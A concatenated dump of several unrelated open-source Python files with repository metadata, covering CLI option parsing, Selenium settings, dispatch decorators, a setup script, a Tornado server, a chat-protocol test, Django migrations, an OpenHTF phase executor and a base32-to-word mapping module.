return opt, required_args
def resolve_args(func, argv, func_name=None):
parser, required_args = func_to_optionparser(func)
options, args = parser.parse_args(argv)
# Special case for stdin/stdout/stderr
for pipe in ('stdin', 'stdout', 'stderr'):
if pipe in required_args:
required_args.remove(pipe)
setattr(options, 'optfunc_use_%s' % pipe, True)
# Do we have correct number af required args?
if len(required_args) > len(args):
if not hasattr(func, 'optfunc_notstrict'):
extra = len(parser._get_all_options()) > 1 and ' [options]' or ''
command = sys.argv[0]
if func_name:
command += ' ' + func_name
parser._errors.append("usage: %s %s%s" % (
command, ' '.join('<%s>' % x for x in required_args), extra))
# Ensure there are enough arguments even if some are missing
args += [None] * (len(required_args) - len(args))
for i, name in enumerate(required_args):
setattr(options, name, args[i])
args[i] = None
fargs, varargs, varkw, defaults = inspect.getargspec(func)
if rest_name in fargs:
args = filter( lambda x: x is not None, args )
setattr(options, rest_name, tuple(args))
return options.__dict__, parser._errors
def run(func, argv=None, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr,
hide_exception_detail=False):
argv = argv or sys.argv[1:]
# Handle multiple functions
if isinstance(func, (tuple, list)):
funcs = dict([(fn.__name__.replace('_', '-'), fn) for fn in func])
try:
func_name = argv.pop(0)
except IndexError:
func_name = None
if func_name not in funcs:
def format( fn ):
blurb = ""
if fn.__doc__:
blurb = fn.__doc__.strip().split('\n')[0]
return " %-10s%s" % (fn.__name__.replace('_', '-'), blurb)
names = [format(fn) for fn in func]
s = subcommand_sep.join(names)
stderr.write("%s\n%s\n" % (header, s) )
return
func = funcs[func_name]
else:
func_name = None
if inspect.isfunction(func):
resolved, errors = resolve_args(func, argv, func_name=func_name)
elif inspect.isclass(func):
if hasattr(func, '__init__'):
resolved, errors = resolve_args(
func.__init__, argv, func_name=func_name)
else:
resolved, errors = {}, []
else:
raise TypeError('arg is not a Python function or class')
# Special case for stdin/stdout/stderr
for pipe in ('stdin', 'stdout', 'stderr'):
if resolved.pop('optfunc_use_%s' % pipe, False):
resolved[pipe] = locals()[pipe]
if not errors:
try:
return func(**resolved)
except Exception as e:
stderr.write(str(e) + '\n')
if not hide_exception_detail:
raise
else:
stderr.write("%s\n" % '\n'.join(errors))
def caller_module(i):
if (i>=0):
i+=1
stk=inspect.stack()[i]
return inspect.getmodule(stk[0])
def main(*args, **kwargs):
mod=caller_module(1)
if mod is None or mod.__name__ == '<module>' or mod.__name__ == '__main__':
run(*args, **kwargs)
return args[0] # So it won't break anything if used as a decorator
# Decorators
def notstrict(fn):
fn.optfunc_notstrict = True
return fn
def arghelp(name, help):
def inner(fn):
d = getattr(fn, 'optfunc_arghelp', {})
d[name] = help
setattr(fn, 'optfunc_arghelp', d)
return fn
return inner
| {
"content_hash": "2a812d9f60ec29dabebcb7bb783d54bb",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 107,
"avg_line_length": 33.01244813278009,
"alnum_prop": 0.5726495726495726,
"repo_name": "Simperium/simperium-python",
"id": "1a9154fff18977ab98dec975e4cd7c526c7fb68d",
"size": "7956",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "simperium/optfunc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24977"
}
],
"symlink_target": ""
} |
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By
driver_class = Firefox
implicit_timeout = 30
wait_timeout = 30
default_search_type = By.ID
try:
from local_webium_settings import *
except ImportError:
pass
| {
"content_hash": "c5c67114502d275a347417a6779dca00",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 43,
"avg_line_length": 19.307692307692307,
"alnum_prop": 0.7689243027888446,
"repo_name": "drptbl/webium",
"id": "aa6228a1cd833ca0428eea3652a2691078668e60",
"size": "251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webium/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "6616"
},
{
"name": "PowerShell",
"bytes": "519"
},
{
"name": "Python",
"bytes": "34538"
},
{
"name": "Shell",
"bytes": "415"
}
],
"symlink_target": ""
} |
def dispatch(*dispatchers, **kwargs):
""" Dispatch
:arg dispatchers: will be a iterable of pair tuple
which has dispatcher function as first element
and target function as second element.
The dispatcher function will take same arguments with target functions
and will return True or False.
When it is a True, corresponding target function will be called.
>>> f = dispatch(
... (lambda x: x % 2, lambda x: str(x) + "is odd"),
... default=lambda x: str(x) + "is even",
... )
...
>>> print(f(3)) # say 3 is odd
:arg default: function will be called if all of dispatchers will return False.
default function is optional so when default is not specified, it will return None.
"""
# JUST FOR SUPPORTING PYTHON 2 SYNTAX
default = kwargs.get('default')
def wrapped(*args, **kwargs):
for dispatcher, func in dispatchers:
if dispatcher(*args, **kwargs):
return func(*args, **kwargs)
if default:
return default(*args, **kwargs)
return wrapped
def all_(*dispatchers):
""" Taking :arg dispatchers: functions and routing when all of dispatchers returns True
"""
def dispatcher(*args, **kwargs):
return all(d(*args, **kwargs) for d in dispatchers)
return dispatcher
def any_(*dispatchers):
""" Taking :arg dispatchers: and routing when some dispatchers returns True
"""
def dispatcher(*args, **kwargs):
return any(d(*args, **kwargs) for d in dispatchers)
return dispatcher
def not_(dispatcher):
""" Taking :arg dispatcher: and routing when the dispatcher returns False
"""
def _dispatcher(*args, **kwargs):
return not dispatcher(*args, **kwargs)
return _dispatcher
class dispatcher:
""" Decorator applying utilities for wrapped function.
Basically dispatcher is just a function which returns bool values, but when
decorating this, dispatcher functions can be combined and inverted.
>>> @dispatcher
... def even(n):
... return n % 2 == 0
...
>>> @dispatcher
... def multiple_three(n):
... return n % 3 == 0
...
>>> even & multiple_three # New dispatcher that routes when multiple of 6.
>>> even | multiple_three # New dispatcher that routes when multiple of 2 or 3.
>>> ~even # New dispatcher that routes when odd
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __and__(self, other):
return self.__class__(all_(self.func, other.func))
def __or__(self, other):
return self.__class__(any_(self.func, other.func))
def __invert__(self):
return self.__class__(not_(self.func))
| {
"content_hash": "a10ba4087ce428214ce02015a250225d",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 91,
"avg_line_length": 31.08888888888889,
"alnum_prop": 0.6208005718370264,
"repo_name": "hirokiky/wraptools",
"id": "8083108265085e03320878a00b2137fa9ba402c8",
"size": "2798",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wraptools/dispatch.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12157"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
setup(
name='fakeredis',
version='0.8.2',
description="Fake implementation of redis API for testing purposes.",
long_description=open(os.path.join(os.path.dirname(__file__),
'README.rst')).read(),
license='BSD',
url="https://github.com/jamesls/fakeredis",
author='James Saryerwinnie',
author_email='js@jamesls.com',
py_modules=['fakeredis'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
install_requires=[
'redis',
]
)
| {
"content_hash": "58685d87e8a9ae337eaecc65f7026dad",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 73,
"avg_line_length": 32.5,
"alnum_prop": 0.5798076923076924,
"repo_name": "Tinche/fakeredis",
"id": "1964d9f5992b0037120e0ef0d1ff7cd6b6478342",
"size": "1040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "185682"
}
],
"symlink_target": ""
} |
import tornado.ioloop
import tornado.options
import tornado.httpserver
from application import Application
import sys
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
print 'Development server is running at http://127.0.0.1:%s/' % options.port
print 'Quit the server with Control-C'
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
| {
"content_hash": "42eb3abeae2998d1cb9a1a451b2358a2",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 30.526315789473685,
"alnum_prop": 0.7448275862068966,
"repo_name": "iYefeng/traits",
"id": "0c6ba2e2cfa8098f8a27332b927791ad28f3aec9",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_learn/web-demo/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1064"
},
{
"name": "C",
"bytes": "7999"
},
{
"name": "C++",
"bytes": "73103"
},
{
"name": "CSS",
"bytes": "12093"
},
{
"name": "Go",
"bytes": "174364"
},
{
"name": "HTML",
"bytes": "1444696"
},
{
"name": "Java",
"bytes": "179087"
},
{
"name": "JavaScript",
"bytes": "176299"
},
{
"name": "Jupyter Notebook",
"bytes": "5166603"
},
{
"name": "M4",
"bytes": "575"
},
{
"name": "Makefile",
"bytes": "5878"
},
{
"name": "Python",
"bytes": "70599"
},
{
"name": "Rust",
"bytes": "316"
},
{
"name": "Shell",
"bytes": "307"
},
{
"name": "Thrift",
"bytes": "7070"
}
],
"symlink_target": ""
} |
import os
import sys
if os.sys.platform == 'win32':
sys.path.append(".\\..") # - dla windowsa
else:
sys.path.append("../") # - dla linuksa
from Contacts import *
from pygglib import GGSession
from Helpers import *
from GGConstans import *
import time
#
# 11327271, haslo eto2007
#
def login_ok_event_handler(sender, args):
print 'Zalogowano.'
def msg_recv_event_handler(sender, args):
print 'Message received:'
print 'sender:', args.sender
print 'seq:', args.seq
print 'msg_class:', GGMsgTypes.reverse_lookup(args.msg_class)
print 'message:', args.message
print
def on_unknown_packet_event_handler(sender, args):
print 'Unknow packet received: type: %d, length: %d' % (args.type, args.length)
print
def on_send_msg_ack_event_handler(sender, args):
print 'msg_send_ack received: status: %s, recipient: %d, seq: %d' % (GGMsgStatus.reverse_lookup(args.status), args.recipient, args.seq)
def on_pubdir_recv_event_handler(sender, args):
print 'PubDir type', args.req_type
print 'PubDir sequence numer', args.seq
entries = args.reply.split("\0\0")
for item in entries.data:
print request_to_dict(item)
print
def on_userlist_reply(sender, args):
print 'UserListReply'
assert type(args.contacts_list) == ContactsList
print
if __name__ == "__main__":
session = GGSession(uin = 11327271, password = 'eto2007')
session.register('on_login_ok', login_ok_event_handler)
session.register('on_msg_recv', msg_recv_event_handler)
session.register('on_unknown_packet', on_unknown_packet_event_handler)
session.register('on_send_msg_ack', on_send_msg_ack_event_handler)
session.register('on_pubdir_recv', on_pubdir_recv_event_handler)
session.register('on_userlist_reply', on_userlist_reply)
session.login()
session.import_contacts_list()
session.export_contacts_list("kontakty.txt")
session.logout()
x = raw_input()
| {
"content_hash": "e6c8ce927540f25e4bf12f7fd6306870",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 136,
"avg_line_length": 32.2,
"alnum_prop": 0.6909937888198758,
"repo_name": "jakubkosinski/pygglib",
"id": "f3e8216fa638927c20ae7fcb19e4ed905077d8db",
"size": "1932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/export_contacts_list_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "100460"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
from awx.main.migrations._create_system_jobs import create_clearsessions_jt, create_cleartokens_jt
class Migration(migrations.Migration):
dependencies = [
('main', '0077_v360_add_default_orderings'),
]
operations = [
# Schedule Analytics System Job Template
migrations.RunPython(create_clearsessions_jt, migrations.RunPython.noop),
migrations.RunPython(create_cleartokens_jt, migrations.RunPython.noop),
migrations.AlterField(
model_name='systemjob',
name='job_type',
field=models.CharField(blank=True, choices=[('cleanup_jobs', 'Remove jobs older than a certain number of days'), ('cleanup_activitystream', 'Remove activity stream entries older than a certain number of days'), ('cleanup_sessions', 'Removes expired browser sessions from the database'), ('cleanup_tokens', 'Removes expired OAuth 2 access tokens and refresh tokens')], default='', max_length=32),
),
migrations.AlterField(
model_name='systemjobtemplate',
name='job_type',
field=models.CharField(blank=True, choices=[('cleanup_jobs', 'Remove jobs older than a certain number of days'), ('cleanup_activitystream', 'Remove activity stream entries older than a certain number of days'), ('cleanup_sessions', 'Removes expired browser sessions from the database'), ('cleanup_tokens', 'Removes expired OAuth 2 access tokens and refresh tokens')], default='', max_length=32),
),
]
| {
"content_hash": "832753d6e9e3569c636a38de5a19c0e0",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 407,
"avg_line_length": 58.44444444444444,
"alnum_prop": 0.697084917617237,
"repo_name": "GoogleCloudPlatform/sap-deployment-automation",
"id": "c6a00a24c1f7266df802bdc82dc4969cd006df25",
"size": "1652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/github.com/ansible/awx/awx/main/migrations/0078_v360_clear_sessions_tokens_jt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
from importlib import import_module
from django.apps import AppConfig as BaseAppConfig
class AppConfig(BaseAppConfig):
name = "portal"
def ready(self):
import_module("portal.receivers")
| {
"content_hash": "87d8543ab8adb815853994d7dedb1966",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 50,
"avg_line_length": 18.818181818181817,
"alnum_prop": 0.7294685990338164,
"repo_name": "acarl123/acuity",
"id": "b4a53a805f4c9eaf0dba91ac9cb8a530eb626afd",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "portal/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "178062"
},
{
"name": "HTML",
"bytes": "1450921"
},
{
"name": "JavaScript",
"bytes": "128158"
},
{
"name": "Python",
"bytes": "10038"
},
{
"name": "Shell",
"bytes": "520"
}
],
"symlink_target": ""
} |
"""PhaseExecutor module for handling the phases of a test.
Each phase is an instance of phase_data.PhaseInfo and therefore has relevant
options. Each option is taken into account when executing a phase, such as
checking options.run_if as soon as possible and timing out at the appropriate
time.
A phase must return an openhtf.PhaseResult, one of CONTINUE, REPEAT, or STOP.
A phase may also return None, or have no return statement, which is the same as
returning openhtf.PhaseResult.CONTINUE. These results are then acted upon
accordingly and a new test run status is returned.
Phases are always run in order and not allowed to loop back, though a phase may
choose to repeat itself by returning REPEAT. Returning STOP will cause a test to
stop early, allowing a test to detect a bad state and not waste any further
time. A phase should not return TIMEOUT or ABORT, those are handled by the
framework.
"""
import collections
import inspect
import logging
import openhtf
from openhtf.exe import phase_data
from openhtf.io import test_record
from openhtf.util import argv
from openhtf.util import threads
DEFAULT_PHASE_TIMEOUT_S = 3 * 60
ARG_PARSER = argv.ModuleParser()
ARG_PARSER.add_argument(
'--phase_default_timeout_s', default=DEFAULT_PHASE_TIMEOUT_S,
action=argv.StoreInModule, target='%s.DEFAULT_PHASE_TIMEOUT_S' % __name__,
help='Test phase timeout in seconds')
_LOG = logging.getLogger(__name__)
class InvalidPhaseResultError(Exception):
"""Raised when a PhaseOutcome is created with an invalid phase result."""
class PhaseOutcome(collections.namedtuple('PhaseOutcome', 'phase_result')):
"""Provide some utility and sanity around phase return values.
This should not be confused with openhtf.PhaseResult. PhaseResult is an
enumeration to provide user-facing valid phase return values. This tuple
is used internally to track other possible outcomes (timeout, exception),
and to perform some sanity checking (weird return values from phases).
If phase_result is None, that indicates the phase timed out (this makes
sense if you think about it, it timed out, so there was no result). If
phase_result is an instance of Exception, then that is the Exception that
was raised by the phase. The raised_exception attribute can be used as
a convenience to test for that condition, and the is_timeout attribute can
similarly be used to check for the timeout case.
The only accepted values for phase_result are None (timeout), an instance
of Exception (phase raised), or an instance of openhtf.PhaseResult. Any
other value will raise an InvalidPhaseResultError.
"""
def __init__(self, phase_result):
if (phase_result is not None and
not isinstance(phase_result, (Exception, openhtf.PhaseResult))):
raise InvalidPhaseResultError('Invalid phase result', phase_result)
super(PhaseOutcome, self).__init__(phase_result)
@property
def is_timeout(self):
"""True if this PhaseOutcome indicates a phase timeout."""
return self.phase_result is None
@property
def raised_exception(self):
"""True if the phase in question raised an exception."""
return isinstance(self.phase_result, Exception)
class PhaseExecutorThread(threads.KillableThread):
"""Handles the execution and result of a single test phase.
The phase outcome will be stored in the _phase_outcome attribute once it is
known (_phase_outcome is None until then), and it will be a PhaseOutcome
instance.
"""
def __init__(self, phase, phase_data):
self._phase = phase
self._phase_data = phase_data
self._phase_outcome = None
super(PhaseExecutorThread, self).__init__(
name='PhaseThread: %s' % self.name)
def _ThreadProc(self):
"""Execute the encompassed phase and save the result."""
# Call the phase, save the return value, or default it to CONTINUE.
phase_return = self._phase(self._phase_data)
if phase_return is None:
phase_return = openhtf.PhaseResult.CONTINUE
# Pop any things out of the exit stack and close them.
self._phase_data.context.pop_all().close()
# If phase_return is invalid, this will raise, and _phase_outcome will get
# set to the InvalidPhaseResultError in _ThreadException instead.
self._phase_outcome = PhaseOutcome(phase_return)
def _ThreadException(self, exc):
self._phase_outcome = PhaseOutcome(exc)
self._phase_data.logger.exception('Phase %s raised an exception', self.name)
def JoinOrDie(self):
"""Wait for thread to finish, return a PhaseOutcome with its response."""
if self._phase.options.timeout_s is not None:
self.join(self._phase.options.timeout_s)
else:
self.join(DEFAULT_PHASE_TIMEOUT_S)
# We got a return value or an exception and handled it.
if isinstance(self._phase_outcome, PhaseOutcome):
return self._phase_outcome
# Check for timeout, indicated by None for PhaseOutcome.phase_result.
if self.is_alive():
self.Kill()
return PhaseOutcome(None)
# Phase was killed.
return PhaseOutcome(threads.ThreadTerminationError())
@property
def name(self):
return self._phase.name
def __str__(self):
return '<%s: (%s)>' % (type(self).__name__, self.name)
__repr__ = __str__
class PhaseExecutor(object):
"""Encompasses the execution of the phases of a test."""
def __init__(self, test_state):
self.test_state = test_state
self._current_phase_thread = None
def ExecutePhases(self):
"""Executes each phase or skips them, yielding PhaseOutcome instances.
Yields:
PhaseOutcome instance that wraps the phase return value (or exception).
"""
while self.test_state.pending_phases:
result = self._ExecuteOnePhase(self.test_state.pending_phases[0])
if not result:
continue
yield result
def _ExecuteOnePhase(self, phase):
"""Executes the given phase, returning a PhaseOutcome."""
phase_data = self.test_state.phase_data
# Check this as early as possible.
if phase.options.run_if and not phase.options.run_if(phase_data):
_LOG.info('Phase %s skipped due to run_if returning falsey.', phase.name)
if self.test_state.pending_phases:
self.test_state.pending_phases.pop(0)
return
_LOG.info('Executing phase %s', phase.name)
phase_record = test_record.PhaseRecord(phase.name, phase.code_info)
self.test_state.running_phase_record = phase_record
with phase_data.RecordPhaseTiming(phase, phase_record):
phase_thread = PhaseExecutorThread(phase, phase_data)
phase_thread.start()
self._current_phase_thread = phase_thread
phase_outcome = phase_thread.JoinOrDie()
# Save the outcome of the phase and do some cleanup.
phase_record.result = phase_outcome
self.test_state.record.phases.append(phase_record)
self.test_state.running_phase_record = None
# We're done with this phase, pop it from the pending phases.
if (phase_outcome.phase_result is openhtf.PhaseResult.CONTINUE and
self.test_state.pending_phases):
self.test_state.pending_phases.pop(0)
_LOG.debug('Phase finished with outcome %s', phase_outcome)
return phase_outcome
def Stop(self):
"""Stops the current phase."""
if self._current_phase_thread:
self._current_phase_thread.Kill()
| {
"content_hash": "ef0b62955d1c1f1db4c4db18ad488e89",
"timestamp": "",
"source": "github",
"line_count": 198,
"max_line_length": 80,
"avg_line_length": 36.94949494949495,
"alnum_prop": 0.7206123564789503,
"repo_name": "amyxchen/openhtf",
"id": "6b747f68462bebb2f0a8f1a66bd6e7a8fa3e73da",
"size": "7911",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openhtf/exe/phase_executor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "3564"
},
{
"name": "Protocol Buffer",
"bytes": "12143"
},
{
"name": "Python",
"bytes": "388070"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cycontacts', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='contact',
old_name='given_name',
new_name='first_name',
),
migrations.RenameField(
model_name='contact',
old_name='family_name',
new_name='last_name',
),
]
| {
"content_hash": "69cc3f634be76ede0ddb72bb6a44ec81",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 40,
"avg_line_length": 22.217391304347824,
"alnum_prop": 0.5459882583170255,
"repo_name": "shawnhermans/cyborgcrm",
"id": "f29ea9afcff3cd57c7579350b213b3ecdc3c31d7",
"size": "535",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyidentity/cycontacts/migrations/0002_auto_20150617_1245.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "26682"
},
{
"name": "DIGITAL Command Language",
"bytes": "667"
},
{
"name": "HTML",
"bytes": "405415"
},
{
"name": "JavaScript",
"bytes": "735"
},
{
"name": "Python",
"bytes": "100893"
},
{
"name": "Shell",
"bytes": "725"
}
],
"symlink_target": ""
} |
from string import ascii_lowercase
from itertools import product
from scipy.spatial.distance import pdist, squareform
import editdistance
import numpy as np
import pdb
import sys
import re
import gzip
NMER_SIZE = 3
# --- loading and prep --- #
def get_base32():
"""
Generate nmers of base32 characters.
"""
alphabet = ascii_lowercase
base32_chars = alphabet + '234567'
base32_nmers = [''.join(x) for x in product(base32_chars, repeat=NMER_SIZE)]
return base32_nmers
def subset_language(vocabulary, vectors, wordlist, N=32768):
"""
Subset the vocabulary/vectors to those in a wordlist.
The wordlist is a list arranged in order of 'preference'.
Note: we hope the vocabulary is contained in the wordlist,
but it might not be. N is the number of words we require.
If the wordlist contains fewer than N words, (but the vocabulary has >= N),
we supplement the result from the vocabulary randomly.
Also, we want to make sure the order of vocabulary is random (because some
structure could negatively influence the optimisation procedure later).
Arguments:
vocabulary list of words (strings)
vectors list of vectors corresponding to vocabulary
wordlist str, list, or array, if str: path for .npy of words
N int: number of words we want vectors for
Returns:
vocabulary_subset list of words (len N)
vectors_subset ndarray of vectors corresponding to words (shape[0] = N)
"""
keep_indices = [] # indices of vocabulary/vectors to keep
added = 0
if type(wordlist) == str:
# load from path
print 'Loading wordlist from', wordlist
wordlist = np.loadtxt(wordlist, dtype=str)
else:
assert type(wordlist) == list or type(wordlist) == np.ndarray
print 'Subsetting vocabulary.'
for word in wordlist:
print word
if added == N:
break
try:
word_index = vocabulary.index(word)
keep_indices.append(word_index)
added += 1
except ValueError:
continue
print 'Acquired', len(keep_indices), 'words.'
miss = N - len(keep_indices)
if miss > 0:
print 'Supplementing with', miss, 'random words.'
for i in xrange(miss):
random_index = np.random.choice(len(vocabulary), 1)
while random_index in keep_indices:
random_index = np.random.choice(len(vocabulary), 1)
keep_indices.append(random_index)
print 'Shuffling.'
# shuffle
np.random.shuffle(keep_indices)
# populate new arrays
print 'Populating subsetted arrays.'
vectors_subset = vectors[keep_indices]
vocabulary_subset = [vocabulary[i] for i in keep_indices]
return vocabulary_subset, vectors_subset
def get_language(path):
"""
Get the LANGUAGE words, and vectors!
Takes a path to a file like
apple 0.3410 0.24 0.4114
orange 0.613 3.414 0.512
Outputs a list like [apple, orange]
and a np array like [[0.3410, 0.24, 0.4114],
[0.613, 3.414, 0.512]]
"""
print 'Loading language from', path
vocabulary = []
vectors = []
if '.gz' in path:
fi = gzip.open(path, 'rb')
else:
fi = open(path, 'r')
for line in fi:
if '\t' in line:
sl = line.strip('\n').split('\t')
else:
sl = line.strip('\n').split(' ')
word = re.sub('\x00', '', sl[0])
vocabulary.append(word)
if len(sl) > 1:
vector = map(float, sl[1:])
else:
vector = np.random.normal(size=5)
vectors.append(vector)
vectors = np.array(vectors)
W = len(vocabulary)
print 'Loaded', W, 'words from', path
return vocabulary, vectors
# --- distance metrics --- #
def distance_lookup_table():
"""
Pairwise character similarity lookup table.
Characters in base32:
base32_chars = alphabet + '234567'
Similarities:
- i ~ l (1 is not a problem as it does not exist in base32)
- b ~ d
- p ~ q
- m ~ n
- v ~ w
- c ~ e
- a ~ o
Note: this is largely arbitrary from me, partially influenced by:
http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3541865/table/t1-ptj3712663/
"""
base32_chars = ascii_lowercase + '234567'
n_chars = len(base32_chars)
# start off all ones
distance_lookup = np.ones(shape=(n_chars, n_chars))
# manually input the above
# 0.5 may not be th best for this
# b ~ d
distance_lookup[base32_chars.index('b'), base32_chars.index('d')] = 0.5
distance_lookup[base32_chars.index('d'), base32_chars.index('b')] = 0.5
# p ~ q
distance_lookup[base32_chars.index('p'), base32_chars.index('q')] = 0.5
distance_lookup[base32_chars.index('q'), base32_chars.index('p')] = 0.5
# m ~ n
distance_lookup[base32_chars.index('m'), base32_chars.index('n')] = 0.5
distance_lookup[base32_chars.index('n'), base32_chars.index('m')] = 0.5
# v ~ w
distance_lookup[base32_chars.index('v'), base32_chars.index('w')] = 0.5
distance_lookup[base32_chars.index('w'), base32_chars.index('v')] = 0.5
# c ~ e
distance_lookup[base32_chars.index('c'), base32_chars.index('e')] = 0.5
distance_lookup[base32_chars.index('e'), base32_chars.index('c')] = 0.5
# a ~ o
distance_lookup[base32_chars.index('a'), base32_chars.index('o')] = 0.5
distance_lookup[base32_chars.index('o'), base32_chars.index('a')] = 0.5
# zeros along the diagonal
for i in xrange(n_chars):
distance_lookup[i, i] = 0
# the horrible dict version (i'm sure there's a lovely zip way to do this but w/e)
distance_lookup_dict = dict()
for (i, a) in enumerate(base32_chars):
for (j, b) in enumerate(base32_chars):
distance_lookup_dict[(a, b)] = distance_lookup[i, j]
return distance_lookup, distance_lookup_dict
def bespoke_distance(nmer1, nmer2, offset_kappa):
"""
Hand-crafted distance function, probably not a real metric.
Thinking about what is 'hard to differentiate', as human looking at strings
Properties:
- adjacent swaps are hard to detect
- m ~ rn
- see pairwise_character_distance
"""
raise NotImplementedError
d = 0
# if the nmers are identical, don't need to do anything complicated
if nmer1 == nmer2:
return d
# check exact correspondences (increment distances)
for (a, b) in zip(nmer1, nmer2):
d += pairwise_character_distance(a, b) # this fn has bespoke distances
# now check with an offset
for (a, b) in zip(nmer1[1:]+nmer[0], nmer2):
d += offset_kappa*pairwise_character_distance(a, b) # this fn has bespoke distances
# negative offset
for (a, b) in zip(nmer[-1]+nmer1[:-1], nmer2):
d += offset_kappa*pairwise_character_distance(a, b) # this fn has bespoke distances
# I can already feel how slow this is going to be.
# some stuff goes here etc zzzz
d = abs(np.random.normal())
return d
def base32_distances(base32_nmers, metric='levenshtein'):
"""
Get pairwise distances (different metrics)
This takes a little while
"""
N = len(base32_nmers)
total = N*(N-1.0)/2
print 'Calculating', N*(N-1)/2, 'pairwise distances.'
d = np.empty(shape=(N, N), dtype=np.float)
n = 0
for i in xrange(N):
for j in xrange(i, N):
n += 1
if n%500000 == 0:
sys.stdout.write('\r'+'%.4f' % (float(n*100)/total)+'%')
sys.stdout.flush()
if metric == 'levenshtein':
dij = editdistance.eval(base32_nmers[i], base32_nmers[j])
elif metric == 'bespoke':
dij = bespoke_distance(base32_nmers[i], base32_nmers[j])
else:
raise NotImplementedError
d[i, j] = dij
d[j, i] = dij
print ''
return d
def visual_string_distance(a, b):
"""
Gets the distance between two strings (a, b) using _visual_ features.
Ideas:
If the length of both is the same, equal to n:
compare sliding window for swaps, remember which letters are involved
in swaps, normalise by length of string
compare letter by letter, using similarity table as for base32
normalise by length of string
(so if 1 position differs with value 1, total dissim is 1/n)
except for position 0, which is special and gets weighted more
also exclude positions involved in swaps
If the lengths are different, by d:
if d > 3: return 1 (max dissimilar)
else:
slide shorter word along longer, see 'same length comparison'
take care about position 0 while sliding
penalise d depending on n (shorter word length)
Other considerations:
phonetic similarity (thanks zach)
cut my life into pizza
this is my plastic fork
"""
raise NotImplementedError
return 0.5
# --- maps --- #
def random_map(nmers, vocabulary):
"""
Totally random map, totally unconstrained, totally boring.
"""
forward_mapping = dict(zip(nmers, vocabulary))
backward_mapping = dict(zip(vocabulary, nmers))
return forward_mapping, backward_mapping
def diverse_map(nmers, vocabulary, vectors):
"""
Map which aims to map pairs of similar base32 nmers to pairs of dissimilar
language words.
"""
N = len(nmers)
A = base32_distances(nmers)
print A.shape
B = squareform(pdist(vectors, 'cosine'))
print B.shape
ordering = find_ordering(A, B)
forward_mapping, backward_mapping = dict(), dict()
for i in xrange(N):
triple = nmers[i]
word = vocabulary[ordering[i]]
forward_mapping[triple] = word
backward_mapping[word] = triple
return forward_mapping, backward_mapping
def get_map(nmers, vocabulary, vectors=None, mapping='random'):
"""
Prep and get a map.
"""
N = len(nmers)
W = len(vocabulary)
if W < N:
print 'ERROR: Not enough words.'
return False
if W > N:
print 'There are', W, 'elements in the vocabulary and only', N,
print 'nmers: subsetting.'
vocabulary_subset = list(np.random.choice(vocabulary, N))
vocabulary = vocabulary_subset
if mapping == 'random':
print 'Using random map.'
forward_mapping, backward_mapping = random_map(nmers, vocabulary)
elif mapping == 'diverse':
print 'Using diverse map.'
if vectors is None:
print 'ERROR: diverse map requires vectors.'
return False
forward_mapping, backward_mapping = diverse_map(nmers, vocabulary, vectors)
else:
print 'ERROR: Not implemented :('
# sanity check
for (k, v) in forward_mapping.iteritems():
if not backward_mapping[v] == k:
print k, v
return forward_mapping, backward_mapping
| {
"content_hash": "c6d02d37f5e270ecd9b28f480de5c66a",
"timestamp": "",
"source": "github",
"line_count": 320,
"max_line_length": 96,
"avg_line_length": 34.703125,
"alnum_prop": 0.6105357946870779,
"repo_name": "corcra/leekspeak",
"id": "69bab2012a676254824d73cf747377ef7a2d835c",
"size": "11176",
"binary": false,
